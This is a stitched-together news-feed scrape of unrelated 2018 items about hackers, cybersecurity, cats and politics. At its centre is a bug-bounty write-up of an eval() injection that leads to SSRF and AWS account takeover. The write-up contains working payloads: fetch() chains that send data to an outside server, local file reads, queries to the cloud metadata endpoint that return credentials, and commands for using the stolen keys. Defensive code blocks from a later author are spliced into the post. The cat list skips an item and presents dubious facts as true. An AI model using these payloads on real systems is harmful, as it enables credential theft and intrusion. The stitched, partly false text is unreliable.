
Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers

HarvardTHUD, a group of percussively talented undergraduate students in Cambridge, Massachusetts, performed a truly respectable, knee slapping cover of the classic Journey song “Don’t Stop Believing” on interchangeable Boomwhackers. We’re a student-run organization at Harvard College that likes to get together on Monday evenings and hit things. We play everything with percussive potential: drum set...

The post Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers appeared first on Laughing Squid.


Pentagon slow to protect weapon systems from cyber threats: U.S. agency
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

Comment on Prayer to Saint Barbara to obtain an impossible favor against Injustices, Evils and Betrayals by minecraft free download 2018
Hi there! I just wanted to ask if you ever have any problems with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no back up. Do you have any methods to prevent hackers?


Low Priority of Cybersecurity Gives Hackers Access to US Weapons Systems – Audit
WASHINGTON (Sputnik) - Hackers working with the US Department of Defense (DOD) were able to take control of major weapons systems now under development, in part because US officials have failed to make cybersecurity a priority, according to an audit by the General Accountability Office (GAO) on Tuesday.
Reaction to De ComplotConcurrent – Episode 28 “The Russian Hackers Hoax” (8-10-2018) by Freeflip
Russian mince hahahaha
Hunton Insurance Head Comments On Hotel Data Breach Coverage Dispute
Hunton Andrews Kurth insurance practice head, Walter Andrews, recently commented to the Global Data Review regarding the infirmities underlying an Orlando, Florida federal district court’s ruling that an insurer does not have to defend its insured for damage caused by a third-party data breach. The decision in St. Paul Fire & Marine Ins. Co. v. Rosen Millennium Inc., which involved a claim for coverage under two general liability insurance policies, turned on whether or not customers’ credit card information obtained from the insured’s payment system had been “made known” and by whom.  According to the district court, the insurance policies required that the credit card information be “made known” by the insured, however in this instance, the publication was made by the third-party hackers.  As Andrews explained, however, although it was undisputed that Florida law controlled interpretation of Millennium’s policies,…
22 impressive facts about cats
Did you know that a physicist once listed his cat as co-author of his paper because he accidentally wrote “we” instead of “I” throughout his work and didn’t bother to change it? Also, believe it or not, the British government has a position called “Chief Mouser To The Cabinet Office” that can only be held by a cat? And even if that, perhaps, doesn’t surprise you, on top of it there is a study that proved cats are more than capable of recognizing their owners’ (or servants’?) voices, but often simply choose to ignore them. See below more interesting facts about cats in this compilation we brought you! Don’t forget to tell us which one is your favorite.


See:

  1. In 1985 Freddie Mercury released a solo album that was dedicated “to my cat Jerry; also to Tom, Oscar and Tiffany, and to all the cat lovers around the world – screw everyone else”
  2. At night, Disneyland is invaded by stray cats. Disney welcomes them because they keep the rat population “down”, and treats them as its own, including neutering and vaccines.
  3. Guinness World Records stopped awarding the world’s most obese cat, or any other animal, to discourage deliberate overfeeding of pets.
  4. Whenever a cat slowly closes and opens its eyes, or blinks at you, it means it trusts you and recognizes you as a friend.
  5. Many shelters do not allow the adoption of black cats around Halloween for fear that they will be sacrificed or tortured in some ritual.
  6. The first in-flight radio transmission was “Roy, come here and get this damn cat”.
  7. A study proved that cats are more than capable of recognizing their owners’ voices, but often choose to ignore them.
  8. Adult cats only meow to communicate with adults.
  9. The two oldest cats on record lived to 38 and 34 years of age. Both belonged to the same owner and lived on a diet of bacon, eggs, broccoli and coffee.
  10. Having a kitten can reduce the risk of a stroke or heart attack by 1/3.
  11. A cat’s brain is 90% similar to a human’s – more similar than a dog’s.
  12. President Lincoln loved cats and once let them eat at the White House dining table during a formal dinner.
  14. The world’s most wanted hacker was once hacked because his password was his cat’s name + 123.
  15. There is a breed of cats, called Lykoi, that look like werewolves.
  16. Cats sleep 70% of their lives.
  17. A domestic cat is faster than Usain Bolt.
  18. A cat can spend more than half of its waking time licking itself or those it cares about.
  19. Black cats are considered a sign of bad luck in the United States, but a sign of good luck in the United Kingdom and Japan.
  20. A cat rubs against people to mark territory.
  21. The reason cats and snakes have vertical pupils is that it improves their depth perception during nighttime hunts.
  22. 65-85% of white cats born with two blue eyes are deaf.

Comment on Clash of Clans Hack apk, Unlimited Money, Gems And more… Everything unlimited, Hack apk Clash of clans by HackeRar Pro
I wonder if it will work Bv. Good video, friend
AWS takeover through SSRF in JavaScript

Here is the story of a bug I found in a private bug bounty program on HackerOne. It took me exactly 12h30, no break, to find it, exploit it and report it. I was able to dump the AWS credentials, which let me fully compromise the company’s account: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of the best bugs of my hunter career, I also learnt a lot during this sprint, so let’s share!

Intro

As I said, the program is private, so let’s call the company ArticMonkey.
For the purpose of their activity, and their web application, ArticMonkey has developed a custom macro language, let’s call it Banan++. I don’t know what language was initially used for the creation of Banan++, but from the webapp you can get a JavaScript version, so let’s dig in!

The original banan++.js file was minified, but still huge: 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function on line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code from the top, but most of the functions were about date manipulation or mathematical operations, nothing really interesting or dangerous. After a while, I finally found one called Union() that looked promising; here is the code:

// Banan++ helper: Union(value, symbol, ...candidates), as shipped in banan++.js
helper.prototype.Union = function() {
  for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
  var value = args.shift(),
      symbol = args.shift(),
      results = args.filter(function(arg) {
        try {
          // the three pieces are concatenated into a string and evaluated as JavaScript
          return eval(value + symbol + arg)
        } catch (e) {
          return !1
        }
      });
  return !!results.length
}

Did you notice that? Did you notice that kinky eval()? Looks sooooooooooo interesting! I copied the code into a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but starts to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth, etc. Normal usage should be something like Union(1,'<',3); and the returned value is true if at least one of these tests is true, otherwise false.
However, there is absolutely no sanitization performed, nor any test regarding the type and the value of the arguments. With the help of my favourite debugger, alert(), I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...
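As an added example (my code, not the post’s and not ArticMonkey’s banan++.js), here is what a Union() that keeps the same contract but never hands user text to eval() looks like: the operator is looked up in a fixed allowlist and the operands are compared as values. The names safeUnion, ALLOWED_OPS, toOperand and demo() are mine; unsafeUnion is a copy of the page’s helper kept only so the two can be run on the same injected input.

```javascript
// Hardened replacement for the Banan++ Union() helper (added example).
// Only these operators are accepted; anything else is rejected, never evaluated.
const ALLOWED_OPS = {
  '<':  (a, b) => a < b,
  '<=': (a, b) => a <= b,
  '>':  (a, b) => a > b,
  '>=': (a, b) => a >= b,
  '==': (a, b) => a === b,   // strict equality, no type coercion
  '!=': (a, b) => a !== b,
};

// Coerce a macro argument to a comparable primitive: numeric strings become
// numbers so '10' < '9' is a numeric, not lexical, comparison; objects are refused.
function toOperand(arg) {
  if (typeof arg === 'number') return arg;
  if (typeof arg === 'string') {
    const n = Number(arg);
    return arg.trim() !== '' && Number.isFinite(n) ? n : arg;
  }
  throw new TypeError('Union(): operands must be numbers or strings');
}

// Same contract as the original: true when `value <symbol> candidate` holds
// for at least one candidate, false when there are no candidates.
function safeUnion(value, symbol, ...candidates) {
  if (candidates.length === 0) return false;
  const key = String(symbol).trim();
  // hasOwnProperty: a symbol such as "toString" must not reach Object.prototype.
  const op = Object.prototype.hasOwnProperty.call(ALLOWED_OPS, key) ? ALLOWED_OPS[key] : undefined;
  if (op === undefined) {
    // e.g. "2;fetch(...)" from the post: refused up front instead of executed
    throw new Error(`Union(): unsupported operator ${JSON.stringify(symbol)}`);
  }
  const left = toOperand(value);
  return candidates.some((c) => op(left, toOperand(c)));
}

// The page's original helper, kept only to contrast behaviour on identical input.
function unsafeUnion(value, symbol, ...args) {
  const results = args.filter((arg) => {
    try { return eval(value + symbol + arg); } catch (e) { return false; }
  });
  return !!results.length;
}

// Demonstration: the "symbol" carries a harmless side effect (constructed input,
// same shape as the post's '2;alert();'). eval() runs it; the allowlist refuses it.
function demo() {
  globalThis.sideEffect = 0;
  const injected = '2;globalThis.sideEffect=1;';
  unsafeUnion('1', injected, '3');
  const ranWithEval = globalThis.sideEffect === 1;
  globalThis.sideEffect = 0;
  let rejected = false;
  try { safeUnion('1', injected, '3'); } catch (e) { rejected = true; }
  return { ranWithEval, rejected, sideEffectAfterSafe: globalThis.sideEffect };
}
```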

Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was an input to inject some malicious code. I remembered that I had already seen some POST parameters using Banan++ functions, so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The parameter operation seemed to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. A sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":null}
[]
{...REDACTED...,"operation":"0"}
[]
{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}
{...REDACTED...,"operation":"Union()"}
[]

What I concluded here was:

  • I cannot inject whatever JavaScript I want
  • I can inject Banan++ functions
  • the response seems to act like a true/false flag depending on whether the interpretation of the parameter operation is true or false (which was very useful because it helped to validate the code I injected)

Let’s continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]

Perfect! If 1 < 3 then the response contains valid data (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semicolon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the API that only returns JSON data, it’s obviously not a client-side injection. I also knew from a previous report that ArticMonkey tends to use a lot of JavaScript server side.

But it didn’t matter, I had to try everything; maybe I could trigger an error that would reveal information about the system the JavaScript runs on. From my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript, but all I got was the error previously mentioned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But I didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But I didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But I didn’t receive anything!!!

Sometimes, you know, you have to test stupid things by yourself to understand how stupid they were… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stayed stuck there for a while. It took me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend; I would later learn that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documentation, which led me to the fetch() function, the new standard for performing ajax calls. That was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is one thing, but it’s a blind SSRF: I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;

x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it took me a while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended up with the following code, which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (r parameter) in my Apache log file was empty.

Since I had found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header x-cache: Hit from cloudfront in some responses). I quickly jumped to the list of the most common SSRF URLs for cloud instances.

And got a nice hit when I tried to access the metadata of the instance.

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded, the output is the directory listing returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn’t know anything about AWS metadata, because it was my first time in da place, I took time to explore the directories and all the files at my disposal. As you will read everywhere, the most interesting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>, which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}
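As an added defensive example (my code, not the post’s and not ArticMonkey’s), this is the kind of egress check a server-side macro engine should run before a macro-originated fetch() is allowed to leave the host: it refuses both URL classes the post used, file:// and the link-local metadata address 169.254.169.254, plus loopback and RFC 1918 ranges. The function names are mine, and it inspects the literal URL only; a production version must also validate the address the hostname actually resolves to.

```javascript
// Outbound URL policy for server-side fetch() (added example, not from the post).

function parseIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const octets = m.slice(1).map(Number);
  return octets.every((o) => o <= 255) ? octets : null;
}

// IPv4 embedded in an IPv6 literal, either as typed (::ffff:a.b.c.d) or as the
// WHATWG URL parser serialises it (::ffff:a9fe:a9fe). Returns octets or null.
function mappedIPv4(host) {
  const dotted = /^::ffff:(\d+\.\d+\.\d+\.\d+)$/.exec(host);
  if (dotted) return parseIPv4(dotted[1]);
  const hex = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/.exec(host);
  if (!hex) return null;
  const hi = parseInt(hex[1], 16), lo = parseInt(hex[2], 16);
  return [hi >> 8, hi & 0xff, lo >> 8, lo & 0xff];
}

// Networks a server-side fetch should never be allowed to reach.
const BLOCKED_V4 = [
  [[169, 254, 0, 0], 16], // link-local; includes the EC2 instance metadata endpoint
  [[127, 0, 0, 0], 8],    // loopback
  [[10, 0, 0, 0], 8],     // RFC 1918
  [[172, 16, 0, 0], 12],
  [[192, 168, 0, 0], 16],
  [[0, 0, 0, 0], 8],      // "this network"; 0.0.0.0 reaches localhost on Linux
];

function inCidr(octets, [base, bits]) {
  const toInt = (o) => ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return (toInt(octets) & mask) === (toInt(base) & mask);
}

// Returns { ok: true } or { ok: false, reason } for a candidate URL string.
// The URL parser canonicalises the host (lower-case, numeric IPv4 spellings
// rewritten as dotted decimal), so the checks below see one form only.
function checkOutboundUrl(raw) {
  let url;
  try { url = new URL(raw); } catch (e) { return { ok: false, reason: 'unparseable URL' }; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };   // file:, gopher:, ...
  }
  const host = url.hostname.replace(/^\[|\]$/g, '').toLowerCase();
  if (host === 'localhost' || host.endsWith('.localhost')) {
    return { ok: false, reason: 'loopback host name' };
  }
  let v4;
  if (host.includes(':')) {
    // IPv6 literal: loopback, unspecified, link-local (fe80::/10), ULA (fc00::/7)
    if (host === '::1' || host === '::' || /^fe[89ab][0-9a-f]:/.test(host) || /^f[cd][0-9a-f]{2}:/.test(host)) {
      return { ok: false, reason: 'internal IPv6 address' };
    }
    v4 = mappedIPv4(host);
  } else {
    v4 = parseIPv4(host);
  }
  if (v4 && BLOCKED_V4.some((cidr) => inCidr(v4, cidr))) {
    return { ok: false, reason: 'internal IPv4 range' };
  }
  return { ok: true };
}
```

On EC2 itself, requiring IMDSv2 (a session token obtained with a PUT before any metadata read) is the complementary host-side control; it post-dates this write-up and is not something the post discusses.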

Exploit the credentials

At that time, I thought the game was over. But for my PoC I wanted to show the criticality of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5 minutes more or less. Anyway, 5 minutes is supposed to be enough to update my own credentials to those ones, 2 copy/pastes, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS masters. Thanks guys, I truly appreciate your commitment, but I finally found the solution in the User Guide of AWS Identity and Access Management. My mistake, apart from not reading the documentation (…), was to only use AccessKeyId and SecretAccessKey; this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my identity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive customer data, static files for the web application and, according to the names of the buckets, probably logs/backups of their servers.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt
07/09/2018 00h30 - report
07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and for agreeing to this article :)

Conclusion

I learnt a lot because of this bug:

  • ReactJS, fetch(), AWS metadata.
  • RTFM! The official documentation is always a great source of (useful) information.
  • At each step new problems appeared. I had to search everywhere, try many different things; I had to push my limits to not give up.
  • I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and satisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time bargaining with these people, simply prove them wrong by doing it.


Comment on Hacker Course by Paulo Tacio
Yes, this and all the courses and packages are available for immediate delivery. Kurumin is only there to show a 100% Brazilian Linux distribution; during the course the distributions that will be used most are Ubuntu and Kali Linux. Any questions, contact us.
Comment on Hacker Course by Paulo Tacio
Yes, not only the hacker course but all the courses and packages are available for immediate delivery. Any questions, contact us.
Comment on Hacker Course by Marceo
Is the course still up?
Comment on Hacker Course by Marceo
Is the course still up? Do you still use Kurumin, isn’t it discontinued?
Pentagon slow to protect weapon systems from cyber threats: U.S. agency
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday. Reported by Reuters 43 minutes ago.
Comment on Tips & Notices – October 2018 by E.M.Smith
From: https://www.theregister.co.uk/2018/10/08/super_micro_us_uk_intelligence/ We have: “In the situation Bloomberg describes, the so-called compromised servers were allegedly making outbound connections. Apple's proprietary security tools are continuously scanning for precisely this kind of outbound traffic, as it indicates the existence of malware or other malicious activity. Nothing was ever found.” My presumption was based on that "security tools" kit having caught something in time, and no foul happened then they punted to the Feds. This assertion is "nothing happened". 2 choices: 1) It happened and is being denied to let the sting play out. Very Plausible. 2) Story is wrong. Also very plausible. No way to choose absent more evidence. What I'm happy about: The Apple statement confirms their IDS / IPS is looking for that stuff. Just what I'd expect (and what I'd do...) . Unknown bit: This was directed at Siri and was pre-production in discovery. It is possible the Engineers caught it and that it never reached legal or IS&T Production... We did a LOT of stuff in ATG that never got communicated to legal or IS&T... I never told them about our Russian Hacker or the bounce off us to the Mil site in Hawaii.. So I'd add the 3rd choice of "It happened, only a few folks know"... and it's most likely IMHO.
Puigdemont suspended the UDI without the mediation offer he claimed

On 1-O, the Palau de la Generalitat lived through a sum of realities. For example, on the top floor of the noble building, the Govern housed about twenty 'hackers'. They were the infantry in the digital war being waged with the State. A strategy that was combined, for example, with a 'call-center' located in London which answered the questions that assailed those running the polling stations. On that 1-O there was even time for tactics. As the clock advanced and it became evident that there would be enough of an electoral base to produce results which, once made public, would serve to proclaim independence, just about everyone began calculating which day would be the one marked to go down in history.

Continue reading....


The Trouble With Cybersecurity Management
Cybersecurity is becoming top of mind for customers and organizations, as highly publicized data breaches and cyberattacks at large corporations have revealed just how much damage a hacker can do by accessing or manipulating an organization’s systems. In addition to the immediate financial and operational consequences, a breached business often faces class-action lawsuits, regulatory fines, […]
Russia's 2016 Cyberattack: What We Do, Don't And May Never Know

There has yet to be a thorough investigation into exactly how much the Russian influence campaign affected the outcome of the 2016 election. The national intelligence community is prohibited from looking into domestic politics and Congress has refused to take up the cause.

So, University of Pennsylvania professor Kathleen Hall Jamieson has decided to try to fill that void. In a new book she attempts to find out exactly what we do, don’t, and may never know. The book is called “Cyberwar: How Russian Hackers and Trolls Helped Elect a President.”


Facebook releases smart video chat speakers amid user privacy concern


DF-Xinhua Report

U.S. social media giant Facebook Monday unveiled a pair of artificial intelligence-powered smart video chat devices, Portal and Portal +, which are designed to connect people and feel like being in the same room.

   Facebook said the new video communication speakers with tablet-size screens for the home can dramatically change the way people keep in touch and their built-in AI technology makes video calling easier and more like hanging out.

   The debut of the Facebook-brand-bearing electronic gadgets represents the social network's first bold entry into the fray in a competition of consumer hardware with other internet giants such as Amazon and Google, which launched their smart speakers years ago.

   The Portal, which is equipped with a 10-inch 1280x800 display, can let users video chat with their families and friends over Facebook Messenger, while the Portal + has a 15-inch 1920x1080 pivoting display.

   Facebook said the two speakers are powered by AI as well as smart camera and sound technology that give users a better, more convenient and hands-free experience. The speaker's Smart Camera can sense movement and action, and automatically pans and zooms to keep everyone in view.

   While the two Facebook-branded devices make consumers' homes smarter and better connected with family members, there is growing concern about user privacy that could arise from internet-related technology, especially after Facebook has been questioned about its privacy policy since a data breach scandal earlier this year.

   Facebook has been extensively challenged about its security measures in protecting users' sensitive data since British data mining firm Cambridge Analytica was accused of illegally accessing the data of 87 million Facebook users without their knowledge.

   Facebook CEO Mark Zuckerberg was summoned to a hearing in U.S. Congress in April to explain the firm's privacy policies.

   Last month, Facebook reported vulnerabilities in its account login mechanism that could affect more than 90 million users, who risked having their private information including names and passwords accessed by hackers.

© DAILY FINLAND Developed by : orangebd
Quinton William Thacker
GATE CITY, VA - Quinton William Thacker 80, of Gate City went to be with the Lord on Monday, October 8, 2018 at Holston Valley Medical Center.
Reminder: Exactly One Week Ago The New York Times Exposed Trump's Tax "Fraud"
Trump continues to be a DDoS-style attack on our democracy's normal circuits of accountability. by Eli Sanders
Trump's "small loan" of $1 million from his dad was, in truth, worth more than $60 million. Joe Raedle / Getty Images

One week ago today, The New York Times demolished the self-made billionaire myth that helped Donald Trump become president. How come it already feels as if the Times story never happened?

Yes, there's a lot else going on. Yes, a lot of people already assumed (correctly) that Trump, who lies about pretty much everything, probably lied about his origin story, too. But it takes a certain "method" to make sure a story as big as this Times investigation disappears quickly from the public consciousness, argues journalism professor Jay Rosen:

Read Rosen's whole thread here. He's describing what other people have cast as a kind of DDoS attack on our democracy's normal circuits of accountability.

"Flooding the system with too much news, much of it misleading or simply false, not only reduces the weight of any individual story; it has the further effect of keeping opponents in a pop-eyed state of outrage, which in turns shows supporters a hateful image of the other side," Rosen writes.

In this light, patient focus—including the focus it takes to read an article as long as this one—constitutes a form of resistance.



"In my interview with Rener Gracie, whose grandfather established the Gracie Jiu-Jitsu method 90 years ago, he told me there are four phases to nearly all sexual attacks on women..."
"... 1) Identify an unsuspecting target, 2) Subdue the target, 3) Exhaust the target, and 4) Execute the sexual assault. We want to fight with all our might and the moves we have above in the second phase. In the third phase, however, right before an assailant executes his sexual attack, all he wants to do is exhaust the victim and gain complete control, so fighting back actually may backfire at that point, wasting energy. Gracie’s Women Empowered training program teaches women to recognize when they’ve entered that phase where they are truly trapped and are no longer in the defensive movements phase—and to feign giving in. Pretend to be compliant (kind of like playing dead for a bear). In those split moments, the predator will think you have given up and will loosen his grip, giving you a chance to get away."

From "Basic Self-Defense Moves Anyone Can Do (and Everyone Should Know)" (LifeHacker).

American weaponry is vulnerable to cyberattacks

A government audit report blames the Pentagon's delay in cybersecurity matters and the difficulties encountered in recruiting specialists. Military equipment is increasingly connected, which makes it more effective, but also more vulnerable to attacks. (Aerial image of the Pentagon, in a photo from February 12, 2009. AP Photo/Charles Dharapak) American weaponry is vulnerable to cyberattacks because of the Pentagon's delay in cybersecurity matters and the difficulties encountered in recruiting specialists, notes a government audit report published this Tuesday (9). In the document titled "The Department of Defense is only beginning to grasp the scale of the vulnerabilities", the US Congress's accounting office, the GAO, stresses that the country's military equipment is increasingly connected. Fighter jets are full of software and sensors, operational command is run from a big screen, soldiers are located on the ground thanks to their GPS, and US Navy ships are increasingly computerized, the report indicates. These programs and sensors make the military more effective, but also more vulnerable to computer attacks. Pentagon specialists who served as hackers showed how easy it was to break into the new equipment produced between 2012 and 2017. "In one case, it took a two-person team only one hour to penetrate a weapon's computer system, and one day to take full control of its operation," the GAO indicates, without specifying, for security reasons, which weapon it refers to. In another case, Pentagon analysts took control of the terminals used during an exercise. The team was able not only to control the system, but to manipulate it to the point that the operators saw on their screen a window asking them to insert a coin to continue.
The Department of Defense "does not know the extent of the vulnerabilities of its weapon systems because, for a number of reasons, the scope and sophistication of the tests were limited". The Pentagon has begun to realize the seriousness of the dangers and the need to increase the protection of its computer systems, but has trouble recruiting specialists, who are better paid in the private sector than in the Armed Forces, notes the document, the GAO's first on this subject. One of the plans consists of hiring young graduates before they finish university, in order to offer them a first professional opportunity and take advantage of their knowledge. At a time when Western countries accuse Russia of having carried out large-scale cyberattacks in recent months, US Secretary of Defense James Mattis announced that the US has decided to make its cyber defense capabilities available to NATO.
Out of the classroom and into the mire: a hacking competition for cyber security students - Telstra Exchange (blog)

Talk about being thrown in the deep end – it may be years before they toss their academic hats in the air, and yet 427 university and TAFE students have been snatched out of cyber security classrooms and thrown behind computers to find and fight real ...


North Korean hackers attacked banks and tried to steal US$1.1 billion
The group, which FireEye identified as APT38, has infiltrated more than 16 organizations in 11 countries.
How to put together a diet that keeps your brain in shape
An excerpt from the book "Brain Food" (Russian title "Диета для ума") by neuroscientist and nutritionist Lisa Mosconi, who has studied the question in full detail.
5 best offline maps for Android
Until recently Google Maps had no offline mode, and because of that it gained several strong competitors that did offer this capability. In this article you will find a brief overview of mobile mapping apps for Android that work without a network connection.
Why getting up at 6 a.m. will not make you successful, and what to do instead
The personal experience of a successful entrepreneur shows that productivity gurus can be wrong.
PlayStation 4: Sony sues hacker over sale of jailbroken consoles
Sony has filed a lawsuit against a hacker who modifies and sells PlayStation consoles.
North Korean hackers tried to steal $1.1-billion in attacks on banks
A North Korean hacking group has tried to steal at least $1.1-billion in a series of attacks on global banks over the past four years, according to cybersecurity firm FireEye.

Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both?

Amazon revealed a breach of customer data last week, but it wasn’t a data breach of the usual variety. Rather than falling prey to a cyberattack or having hackers exploit unsecured code, customer email addresses were leaked by an employee to an online reseller in exchange for money. What you need to know: 1.) A […]

The post Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both? appeared first on Adam Levin.


Google+ to be shut down by August 2019
Source: Wikipedia (public domain)
Yesterday a news item made the rounds on many SL blogs, one that also affects me directly. Google is shutting down its social network Google+ by August of next year. For me it is the only platform on which, besides my blog, I still regularly posted anything. Facebook is out of the question for me for various reasons, and I never really warmed to Twitter, although I have often linked to posts from there in my blog posts.

The reason for the closure is said to be a data leak that hackers exploited to steal the account information of 500,000 users. That is said to have happened back in March of this year. Yet Google did not pass this information on to its customers until yesterday. The closure of Google+ was then packaged as a sub-item in the announcement of the data leak.

Source: Google+
Only the consumer version of Google+ is being closed. The paid Enterprise version is to remain for the time being. Google plans to begin switching off Google+ features in a few weeks. The final end is announced for August 2019. In addition, further features of Google Accounts will be restricted or changed.

I am slowly finding it galling how Google treats its customers. They apparently take the view that, as one of the three largest companies in the world, they no longer need to show consideration for anything. In recent years I have personally been affected by the discontinuation of iGoogle (RSS reader) and Picasa (online photo database). Now Google+ follows. Should Blogger also shut down, I will give up all activity on the web. Overall, Google is constantly shutting down services that are popular with many people, as this list from the last five months shows.

An article on Golem from May 2018 also fits all this nonsense from Google: Google says goodbye to "Don't be evil". Basically, Google is by now not one bit better than Facebook...
5 SaaS Security Best Practices for Developers

